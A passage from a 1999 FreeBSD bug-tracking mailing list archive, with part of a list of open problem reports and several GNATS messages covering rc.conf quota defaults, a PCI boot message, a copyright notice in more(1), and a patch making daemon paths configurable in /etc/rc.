Unnecessary use of magic numbers in F_[SG o [1999/07/20] ports/12725ache Doing a 'make install' for bash2 gets ins o [1999/07/20] ports/12726jfitz p5-Pg fixed o [1999/07/21] ports/12735ports New ports: lang/ghc o [1999/07/21] ports/12737jfitz regex for checking load avergaes is wrong o [1999/07/21] ports/12739ports port for the AT&T's DjVu Netscape plug-in o [1999/07/21] ports/12752ports Update for math/gnuplot+ o [1999/07/22] ports/12761wosch sysutils/stat doesn't terminate buffer an o [1999/07/22] kern/12764 luigi Patch for using x11amp with voxware (stol o [1999/07/22] misc/12765 cable problem: link down for de0 NICs. o [1999/07/22] bin/12767 doc Expand /etc/ttys manpage o [1999/07/22] bin/12768 billf Compilation warning for fortune.c o [1999/07/22] kern/12770 mount_msdos causes panic: kmem_malloc(134 o [1999/07/23] misc/12776 Add PAM hooks to rlogind and rshd f [1999/07/23] bin/12782 sheldonh xntpd doesn't handle interface aliases pr o [1999/07/24] ports/12787obrien port of GNU helloworld o [1999/07/24] bin/12789 Confusing error msg when dumping a filesy o [1999/07/24] ports/12790kris Update Port: maildrop s [1999/07/25] bin/12801 sheldonh nvi infinite recursion with options "left o [1999/07/25] kern/12803 obrien patch to make xe driver's noise configura o [1999/07/25] bin/12806 `sh -e' doesn't parse multi-command lines o [1999/07/26] ports/12817kris gdict fix for conflict with dict port f [1999/07/26] bin/12825 sheldonh doscmd build depends on X o [1999/07/27] kern/12833 Support for TI1225 PCI to CardBus Bridge o [1999/07/27] ports/12835ports New port: libcgic-1.06 o [1999/07/27] ports/12836jfitz p5-Apache port mod_perl part is out of da o [1999/07/28] ports/12851jmz XFree86 needs change for pc98 o [1999/07/28] kern/12855 panic:softdep_flushfiles:looping, caused f [1999/07/28] bin/12858 des patch to make systat -vmstat display # of o [1999/07/28] ports/12864ache update: less-340 a [1999/07/28] bin/12866 sheldonh [PATCH] RFE for /bin/ls to add a -n optio o [1999/07/29] ports/12874markm Update to xinetd port o [1999/07/30] misc/12887 Problem with "top" command in SMP o [1999/07/30] misc/12888 strange kernel messages when copying file o [1999/07/30] ports/12890obrien nmap seems to break under certain conditi o [1999/07/30] ports/12891torstenb Please update converters/recode to 3.5 o [1999/07/31] kern/12896 Incorrect CPU model display at boot time o [1999/07/31] bin/12898 Added a command-line switch to netstat to o [1999/07/31] ports/12899ports New port: wmnet-new o [1999/07/31] ports/12903ports new ports/database/p5-* o [1999/07/31] ports/12904ports new ports/devel/gperf o [1999/08/01] ports/12909ports New port: dc20pack o [1999/08/01] ports/12915ports Add elm 2.5 to ports o [1999/08/01] ports/12916wosch Update Checkbot to 1.56 o [1999/08/01] ports/12919ports New port: gnomeusersguide o [1999/08/02] ports/12921ports [PATCH] palm/xcopilot contains odd markup o [1999/08/02] ports/12924ports port of GRacer, a 3D motor sports simulat o [1999/08/02] docs/12933 n_hibma sio.4 misses description of 0x0080 flag o [1999/08/02] ports/12934ache procmail 3.13 port doesn't have "install- o [1999/08/03] bin/12939 add flag to quota to suppress NFS quota c o [1999/08/03] ports/12941ports New port: Hyperlatex (print/hyperlatex) o [1999/08/03] bin/12942 m4: len(`') returns `' a [1999/08/03] kern/12943 dg fxp driver not completely compatible with o [1999/08/03] bin/12946 top(1) gives incorrect delay default o [1999/08/04] docs/12951 doc missing link to japanese mailing list gui o [1999/08/04] ports/12952ports make _PORT_USE touch cookies by variable, o [1999/08/04] ports/12953ports tcl81-thread breaks package naming conven o [1999/08/04] bin/12957 rpc.rusersd dumps core with signal 11 whe o [1999/08/04] bin/12960 des basename(3) and dirname(3) o [1999/08/04] bin/12962 des basename(3) and dirname(3) part 2 o [1999/08/04] kern/12966 receiver lockups in vr0 driver o [1999/08/04] docs/12969 doc Informacion incorrecta para versiones Fre o [1999/08/04] ports/12974ports New port - numchar (converts phone number o [1999/08/05] bin/12982 last does not support -y option. o [1999/08/05] misc/12983 system hang accessing mounted msdos flopp o [1999/08/05] misc/12992 sector size independent patch for msdosfs o [1999/08/05] i386/12993 gibbs "ahc0: Data Parity Error Detected during o [1999/08/05] docs/12994 hoek Update to getopt.3 to agree with style.9 o [1999/08/06] ports/12999ports Update web500gw port to 2.1b3 o [1999/08/06] bin/13000 vi core dumped o [1999/08/06] ports/13006erich update emulators/x48 to 0.4.1d o [1999/08/07] ports/13012kris update port: xwhois-0.3.6 to 0.3.7 o [1999/08/07] conf/13016 Wrong sendmail.cf file used by mergemaste o [1999/08/07] docs/13020 mpp Manpage capitalization o [1999/08/08] docs/13034 doc incorrect (old/obsolete) manpage for name o [1999/08/08] ports/13035ports new port: jgraph version 8.3 o [1999/08/08] misc/13036 de doesn't work with DEC 21143 based PCI o [1999/08/08] docs/13037 doc netstat(1) -a flag with -r is undocumente o [1999/08/08] conf/13038 [Patch] pccard.conf for I-O Data PCLATE/ o [1999/08/09] bin/13039 make cannot find archive members o [1999/08/09] bin/13042 make doesn't handle wildcards in subdirec o [1999/08/09] bin/13043 minigzip -c option support. o [1999/08/09] bin/13046 brian [PATCH] ppp don't close session on modem o [1999/08/09] ports/13048ports ports/security/ssh2 3.2 & current fail to o [1999/08/09] i386/13051 after installation on system using COM1, o [1999/08/10] kern/13062 lnc ethernet xmit underflow problem o [1999/08/10] ports/13065marcel emulators/linux_base has wrong timezone o [1999/08/11] bin/13068 Don't stamp out score files! o [1999/08/11] ports/13069ports Fixed port: qvwm -> 1.1 o [1999/08/11] bin/13070 line(1) as required by Unix 98 o [1999/08/11] bin/13071 link(1) as required by Unix 98 o [1999/08/11] bin/13072 billf Extensions to biff(1) o [1999/08/11] bin/13073 billf Extensions to mesg(1) o [1999/08/11] bin/13074 unlink(1) as required by Unix 98 o [1999/08/11] ports/13077ports Update port: ftp/lftp o [1999/08/11] docs/13079 mpp new man page describing timeradd() family o [1999/08/11] kern/13082 dfr Improved support for NE2000 PnP cards o [1999/08/11] ports/13084ports qvwm port: upgrade to 1.1 o [1999/08/11] ports/13085ports new port: p5-SQL-Statement o [1999/08/11] misc/13089 sysinstall repeatedly installs a distribu a [1999/08/12] bin/13091 sheldonh [PATCH] pdksh-derived replacement for tes o [1999/08/12] bin/13092 des Fetch doesn't default to the correct http o [1999/08/12] docs/13096 doc Update doc: doc/ru/FAQ/applications.sgml o [1999/08/12] bin/13108 authunix_create_default includes egid twi o [1999/08/12] ports/13109ports math/gnuplot port appears to be broken o [1999/08/13] ports/13115ports update misc/screen to 3.9.4 o [1999/08/13] docs/13116 doc typo in ms(7) o [1999/08/13] misc/13117 CVS repo src/lib/libc_r/uthread incorrect o [1999/08/13] ports/13123ports ports/news/cnews to honor PREFIX better o [1999/08/13] ports/13124ports New port, LinAlg; request for local hosti o [1999/08/13] ports/13126ports Update Etherboot to 4.2.5 and include new o [1999/08/13] bin/13128 billf pkg_delete doesn't handle absolute pathna o [1999/08/13] ports/13129torstenb Postfix Port Ignores MANPREFIX o [1999/08/13] ports/13133chuckr update: xpdf 0.90 o [1999/08/14] docs/13134 doc A typo in ax.4 manual pages o [1999/08/14] ports/13136ports new port: guiTAR 0.1.4 o [1999/08/14] bin/13143 billf changing mount flags on a mounted filesys o [1999/08/14] ports/13149ports New port : math/topaz o [1999/08/15] ports/13151ports new port: www/latte o [1999/08/15] misc/13152 systemwide username too short (currently o [1999/08/15] docs/13153 doc fdc.4 has typo (a line which begin with ' o [1999/08/15] ports/13159ports New port: java/collections o [1999/08/15] ports/13160ports New port: java/jaf o [1999/08/15] kern/13161 alfred mounting on top of a mounted file system o [1999/08/15] ports/13162ports New port: java/infobus o [1999/08/15] ports/13163ports New port: java/javamail o [1999/08/15] kern/13164 kthread_exit stops, but doesn't release p o [1999/08/15] ports/13167ports [PATCH] security/ssh package keygen fails o [1999/08/15] i386/13171 "config" not quite right for kernel not n o [1999/08/16] ports/13173ports New port: yiff-0.33 o [1999/08/16] kern/13176 cannot set _default_ colours for console o [1999/08/16] misc/13185 "tengo problemas con el pop3" o [1999/08/17] ports/13190torstenb update port shells/zsh to 3.0.6 o [1999/08/17] ports/13191ports New port: fire-1.0 o [1999/08/17] docs/13194 doc Bad info in handbook/kernelconfig o [1999/08/17] docs/13197 mpp aio_*(2) not installing by make installwo o [1999/08/17] ports/13201ports new port: xmess (X11 emulator for game co o [1999/08/17] docs/13207 doc Update to the FAQ o [1999/08/17] kern/13209 IPFILTER_DEFAULT_BLOCK not in /usr/src/sy o [1999/08/17] docs/13211 chris [LIST] Some man pages has references to n o [1999/08/17] kern/13215 ALPS GlidePoint in Sony Z505 not recogniz o [1999/08/17] ports/13217ports New port xisp-2.6 o [1999/08/18] docs/13218 mpp Many manpages still not conformed mdoc(7) o [1999/08/18] kern/13220 mkdep: compile failed - ../../pci/if_de.c o [1999/08/18] docs/13222 doc Missing links for {v,}{err,warn}c functio o [1999/08/18] docs/13225 doc fpa.4 seems to be i386 specific and shoul s [1999/08/18] docs/13226 phantom alpm.4 has not linked to .../man/man4 o [1999/08/18] docs/13229 doc hier.7 is out-of-date o [1999/08/18] kern/13232 panic("rtfree"); when sending bootp reque s [1999/08/18] bin/13235 mpp allow preprocessing with tbl(1) for nroff o [1999/08/18] bin/13236 billf Patch for whois to use UK Nominet databas o [1999/08/18] ports/13237ports www/gwstat is dead o [1999/08/18] conf/13249 sysinstall not installing from a local ft o [1999/08/18] ports/13251ports New port: founts-11 s [1999/08/19] kern/13252 niced jobs don't behave really nice o [1999/08/19] bin/13254 yp_all error messages have wrong text o [1999/08/19] ports/13258ports www/gwstat port is dead o [1999/08/19] ports/13263ports new port editors/aee o [1999/08/19] misc/13265 lock doesn't lock (doesn't work) o [1999/08/20] misc/13266 Removal of #defines and addition of const o [1999/08/20] ports/13267ports New port: glasteroids-1.0 o [1999/08/20] misc/13275 inter.phone has old codes for Guatemala o [1999/08/20] bin/13278 rogue: killed by fire corrupts score file o [1999/08/20] kern/13281 wollman Support for VLANs missing? o [1999/08/20] misc/13282 partial compliance of dlopen to the Singl o [1999/08/20] docs/13283 doc A macro used in 'asc.4' should be changed o [1999/08/21] docs/13284 doc Allow .Rv macro for man section 7 o [1999/08/21] docs/13289 doc sc is documented, but manpage not present o [1999/08/21] ports/13291ports New port: xap-xwf-0.7.8 o [1999/08/21] ports/13295ports Mesa-3.0 needs patch to fix ELF dependent o [1999/08/21] ports/13296ports [NEW PORT] Togl - An OpenGL Widget for Tk o [1999/08/21] ports/13297ports [NEW PORT] PyOpenGL - An OpenGL interface o [1999/08/21] ports/13301ports please delete tac_plus port o [1999/08/21] kern/13307 Cant build kernet for 2.2.8 o [1999/08/21] bin/13309 Fixes to nos-tun o [1999/08/21] ports/13311ports One of lang/modula-3-lib distfiles is bro o [1999/08/21] ports/13312ports new port dhid a [1999/08/21] kern/13314 sheldonh can't compile when softupdates + debug. o [1999/08/21] ports/13315ports upgrade GNU textutils port to version 2.0 o [1999/08/22] ports/13318ports tkseti port is broken o [1999/08/22] ports/13319dbaker rc5des443 port does not nice o [1999/08/22] ports/13320ports New port: cfingerd o [1999/08/22] ports/13324ports New port: zope-2.0.0b5 o [1999/08/22] ports/13325ports Update port: www/roxen o [1999/08/22] misc/13326 additional timeval interfaces for 4.0. o [1999/09/06] ports/13596ports Update port: cad/xcircuit to 2.0a10 o [1999/09/06] ports/13597ports Update port: math/linpack o [1999/09/06] misc/13598 Update port: math/netcdf to 3.5b2 o [1999/09/06] ports/13599ports Update port: devel/cxref to 1.5a o [1999/09/06] ports/13600ports Update port: devel/flick to 2.0 o [1999/09/06] ports/13601ports Update port: editor/the to 2.8 o [1999/09/06] ports/13602ports Update port: x11-toolkits/gtkstep to 1.8 1198 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 11:25:33 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4008415956; Mon, 6 Sep 1999 11:25:31 -0700 (PDT) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA60197; Mon, 6 Sep 1999 11:25:30 -0700 (PDT) (envelope-from cpiazza@FreeBSD.org) Date: Mon, 6 Sep 1999 11:25:30 -0700 (PDT) From: Message-Id: <199909061825.LAA60197@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: misc/13598: Update port: math/netcdf to 3.5b2 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: math/netcdf to 3.5b2 Responsible-Changed-From-To: freebsd-bugs->freebsd-ports Responsible-Changed-By: cpiazza Responsible-Changed-When: Mon Sep 6 11:25:14 PDT 1999 Responsible-Changed-Why: Misfiled PR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 11:52: 1 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D10D21599B for ; Mon, 6 Sep 1999 11:51:58 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA62255; Mon, 6 Sep 1999 11:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from shattered.disturbed.net (shattered.disturbed.net [205.236.147.18]) by hub.freebsd.org (Postfix) with ESMTP id B0DD4159A8 for ; Mon, 6 Sep 1999 11:46:16 -0700 (PDT) (envelope-from veers@disturbed.net) Received: from localhost (user: 'veers', uid#1000) by disturbed.net id ; Mon, 6 Sep 1999 14:45:47 -0400 Message-Id: <19990906184551Z61528-249+96@disturbed.net> Date: Mon, 6 Sep 1999 14:45:47 -0400 From: veers@disturbed.net Reply-To: veers@disturbed.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/13603: minor change to the quota behavior of etc/defaults/rc.conf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13603 >Category: misc >Synopsis: quota integrity checks are off by default >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Sep 6 11:50:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Alex Perel >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: -current >Description: An earlier submission of mine set the default quota_check variable to NO, which effectively turned off quota integrity checks unless otherwise specified. This is not the desired effect since it's better safe than sorry, and quota checks should run unless otherwise noted. I blame human for this mistake. >How-To-Repeat: set enable_quotas=YES in /etc/rc.conf. reboot. quotacheck will not run. >Fix: --- etc/defaults/rc.conf.old Mon Sep 6 14:35:20 1999 +++ etc/defaults/rc.conf Mon Sep 6 14:35:28 1999 @@ -206,7 +206,7 @@ sendmail_flags="-bd -q30m" # Flags to sendmail (if enabled) dumpdev="NO" # Device name to crashdump to (if enabled). enable_quotas="NO" # turn on quotas on startup (or NO). -check_quotas="NO" # Check quotas on startup (or NO). +check_quotas="YES" # Check quotas on startup (or NO). accounting_enable="NO" # Turn on process accounting (or NO). ibcs2_enable="NO" # Ibcs2 (SCO) emulation loaded at startup (or NO). linux_enable="NO" # Linux emulation loaded at startup (or NO). >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 13:24: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4109815F27; Mon, 6 Sep 1999 13:23:56 -0700 (PDT) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA69963; Mon, 6 Sep 1999 13:23:55 -0700 (PDT) (envelope-from cpiazza@FreeBSD.org) Date: Mon, 6 Sep 1999 13:23:55 -0700 (PDT) From: Message-Id: <199909062023.NAA69963@freefall.freebsd.org> To: veers@disturbed.net, cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org, cpiazza@FreeBSD.org Subject: Re: misc/13603: quota integrity checks are off by default Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: quota integrity checks are off by default State-Changed-From-To: open->suspended State-Changed-By: cpiazza State-Changed-When: Mon Sep 6 13:22:57 PDT 1999 State-Changed-Why: This needs to be MFC'd, but releng_3 is frozen. Responsible-Changed-From-To: freebsd-bugs->cpiazza Responsible-Changed-By: cpiazza Responsible-Changed-When: Mon Sep 6 13:22:57 PDT 1999 Responsible-Changed-Why: So I don't forget it To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 14:11:55 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8C19715559 for ; Mon, 6 Sep 1999 14:11:48 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA72703; Mon, 6 Sep 1999 14:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Mon, 6 Sep 1999 14:10:02 -0700 (PDT) Message-Id: <199909062110.OAA72703@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Parag Patel Subject: Re: kern/13546: Too-verbose output from PCI probe at bootup Reply-To: Parag Patel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/13546; it has been noted by GNATS. From: Parag Patel To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: kern/13546: Too-verbose output from PCI probe at bootup Date: Mon, 06 Sep 1999 14:08:03 -0700 Following up to my easlier bug-report (kern/13546), I looked over the PCI code in STABLE and CURRENT more closely. The CURRENT code does not display this messaage because the code is no longer there! CURRENT probes for and attaches PCI bridges as bus/devices and STABLE does not. In pci/pci.c, the STABLE version uses the "bushigh" return value from pci_probebus() to determine the next PCI bus number to probe. My guess is that the 4xPPRO box I've got lies and always returns one more bus to probe for this code. CURRENT's pci/pci.c however doesn't use this "bushigh" information from pci_add_children(), and indeed doesn't use its return value at all. (The code determining bushigh can be deleted and pci_add_children should return "void".) It seems to detect the bridge chip and attach that as a device and then probes under it. STABLE doesn't seem to do this and its code is scattered with XXX througout. So I think my earlier patch for simply wrapping the "Probing PCI bus" message with an "if (bootverbose)" is the right solution/workaround for systems like mine. Not that it's a big deal - it's easy enough for me to patch by hand - but I thought that others may be similarly afflicted. -- Parag Patel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 19:23:46 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D05BB14C97; Mon, 6 Sep 1999 19:23:44 -0700 (PDT) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA94404; Mon, 6 Sep 1999 19:23:44 -0700 (PDT) (envelope-from steve@FreeBSD.org) Date: Mon, 6 Sep 1999 19:23:44 -0700 (PDT) From: Message-Id: <199909070223.TAA94404@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-bugs@FreeBSD.org, steve@FreeBSD.org Subject: Re: bin/12727: Game patches from NetBSD Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Game patches from NetBSD Responsible-Changed-From-To: freebsd-bugs->steve Responsible-Changed-By: steve Responsible-Changed-When: Mon Sep 6 19:22:52 PDT 1999 Responsible-Changed-Why: I'll work on this one during a meeting I have in the morning. :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 20:10:52 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from backup.af.speednet.com.au (af.speednet.com.au [202.135.206.244]) by hub.freebsd.org (Postfix) with ESMTP id D37CD15425; Mon, 6 Sep 1999 20:10:46 -0700 (PDT) (envelope-from andyf@speednet.com.au) Received: from localhost (localhost [127.0.0.1]) by backup.af.speednet.com.au (8.9.3/8.9.3) with ESMTP id NAA21513; Tue, 7 Sep 1999 13:07:43 +1000 (EST) (envelope-from andyf@speednet.com.au) Date: Tue, 7 Sep 1999 13:07:43 +1000 (EST) From: Andy Farkas X-Sender: andyf@localhost To: steve@FreeBSD.ORG Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: bin/12727: Game patches from NetBSD In-Reply-To: <199909070223.TAA94404@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Responsible-Changed-From-To: freebsd-bugs->steve > Responsible-Changed-By: steve > Responsible-Changed-When: Mon Sep 6 19:22:52 PDT 1999 > Responsible-Changed-Why: > I'll work on this one during a meeting I have in the morning. :) Please also consider bin/13068. Thanks. ps. the patch to the cribbage Makefile in 13068 is wrong... -- :{ andyf@speednet.com.au Andy Farkas System Administrator Speednet Communications http://www.speednet.com.au/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 20:17:56 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F320A15425; Mon, 6 Sep 1999 20:17:54 -0700 (PDT) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA99118; Mon, 6 Sep 1999 20:17:54 -0700 (PDT) (envelope-from steve@FreeBSD.org) Date: Mon, 6 Sep 1999 20:17:54 -0700 (PDT) From: Message-Id: <199909070317.UAA99118@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-bugs@FreeBSD.org, billf@FreeBSD.org Subject: Re: bin/13068: Don't stamp out score files! Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Don't stamp out score files! Responsible-Changed-From-To: freebsd-bugs->billf Responsible-Changed-By: steve Responsible-Changed-When: Mon Sep 6 20:17:08 PDT 1999 Responsible-Changed-Why: This is related to bin/12727. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 23:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 67F9B14F04 for ; Mon, 6 Sep 1999 23:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA57461; Mon, 6 Sep 1999 23:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from smtp.dti.ne.jp (smtp.dti.ne.jp [210.170.128.120]) by hub.freebsd.org (Postfix) with ESMTP id 8001F14C57 for ; Mon, 6 Sep 1999 23:44:14 -0700 (PDT) (envelope-from shigio@tamacom.com) Received: from choota.signet.or.jp (PPP38.tama-ap5.dti.ne.jp [210.170.192.38]) by smtp.dti.ne.jp (8.9.0/3.7W) with ESMTP id PAA01355 for ; Tue, 7 Sep 1999 15:44:12 +0900 (JST) Received: (from shigio@localhost) by choota.signet.or.jp (8.8.8/) id PAA01617; Tue, 7 Sep 1999 15:41:59 +0900 (JST) Message-Id: <199909070641.PAA01617@tamacom.com> Date: Tue, 7 Sep 1999 15:41:59 +0900 (JST) From: shigio@tamacom.com Reply-To: shigio@tamacom.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/13607: needless copyright notice Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13607 >Category: bin >Synopsis: copyright notice should be deleted. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Sep 6 23:50:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Shigio Yamaguchi >Release: FreeBSD-STABLE >Organization: Tama Communications Corporation >Environment: >Description: I have found my copyright notice on /usr/src/usr.bin/more/tags.c. Thanks to the person who write this but I don't insist my copyright on my patch that was originally for nvi and used here. So my copyright notice about /usr/src/usr.bin/more/tags.c is needless. My hope is deleting such notice from the source code because it keep the original source clean. >How-To-Repeat: >Fix: [/usr/src/usr.bin/more/tags.c] /* * Copyright (c) 1988 Mark Nudleman * Copyright (c) 1988, 1993 * The Regents of the University of California. All rights reserved. * Portions copyright (c) 1996, 1997, 1998 Shigio Yamaguchi. * | v /* * Copyright (c) 1988 Mark Nudleman * Copyright (c) 1988, 1993 * The Regents of the University of California. All rights reserved. * >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 0:13:26 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1913114EBB; Tue, 7 Sep 1999 00:13:25 -0700 (PDT) (envelope-from n_hibma@FreeBSD.org) Received: (from n_hibma@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA63842; Tue, 7 Sep 1999 00:12:15 -0700 (PDT) (envelope-from n_hibma@FreeBSD.org) Date: Tue, 7 Sep 1999 00:12:15 -0700 (PDT) From: Message-Id: <199909070712.AAA63842@freefall.freebsd.org> To: n_hibma@FreeBSD.org, freebsd-bugs@FreeBSD.org, hoek@FreeBSD.org Subject: Re: bin/13607: copyright notice should be deleted. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: copyright notice should be deleted. Responsible-Changed-From-To: freebsd-bugs->hoek Responsible-Changed-By: n_hibma Responsible-Changed-When: Tue Sep 7 00:10:34 PDT 1999 Responsible-Changed-Why: He made the change to rev. 1.3 of the file (to Stable as well as CURRENT). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 1:10:58 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F0A8915309 for ; Tue, 7 Sep 1999 01:10:54 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA85099; Tue, 7 Sep 1999 01:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 98D4515B18; Tue, 7 Sep 1999 01:00:29 -0700 (PDT) Message-Id: <19990907080029.98D4515B18@hub.freebsd.org> Date: Tue, 7 Sep 1999 01:00:29 -0700 (PDT) From: goran.lowkrantz@infologigruppen.se To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: conf/13609: Some deamons not replacable at boot time via /etc/rc.conf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13609 >Category: conf >Synopsis: Some deamons not replacable at boot time via /etc/rc.conf >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Sep 7 01:10:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Goran Lowkrantz >Release: 3.3-RC >Organization: Infologigruppen Alfa AB >Environment: FreeBSD tandgrisner.ign.se 3.3-RC FreeBSD 3.3-RC #5: Sun Sep 5 13:11:28 CEST 1999 root@:/usr/src/sys/compile/TANDGRISNER i386 >Description: Some of the commonly replaces deamons don't have variables for the program path. Most of the deamons started in rc.network heve this but most other deamons stared from other scrips don't. In the attched patch sendmail, syslogd and inetd are added to the replacable deamons. >How-To-Repeat: >Fix: *** rc.orig Mon Sep 6 00:43:12 1999 --- rc Mon Sep 6 00:44:17 1999 *************** *** 226,232 **** fi rm -f /var/run/log ! echo -n ' syslogd'; syslogd ${syslogd_flags} fi echo '.' --- 226,232 ---- fi rm -f /var/run/log ! echo -n ' syslogd'; ${syslogd_program} ${syslogd_flags} fi echo '.' *************** *** 315,321 **** # echo -n starting standard daemons: if [ "X${inetd_enable}" != X"NO" ]; then ! echo -n ' inetd'; inetd ${inetd_flags} fi if [ "X${cron_enable}" != X"NO" ]; then --- 315,321 ---- # echo -n starting standard daemons: if [ "X${inetd_enable}" != X"NO" ]; then ! echo -n ' inetd'; ${inetd_program} ${inetd_flags} fi if [ "X${cron_enable}" != X"NO" ]; then *************** *** 327,333 **** fi if [ "X${sendmail_enable}" = X"YES" -a -r /etc/sendmail.cf ]; then ! echo -n ' sendmail'; /usr/sbin/sendmail ${sendmail_flags} fi if [ "X${usbd_enable}" = X"YES" ]; then --- 327,333 ---- fi if [ "X${sendmail_enable}" = X"YES" -a -r 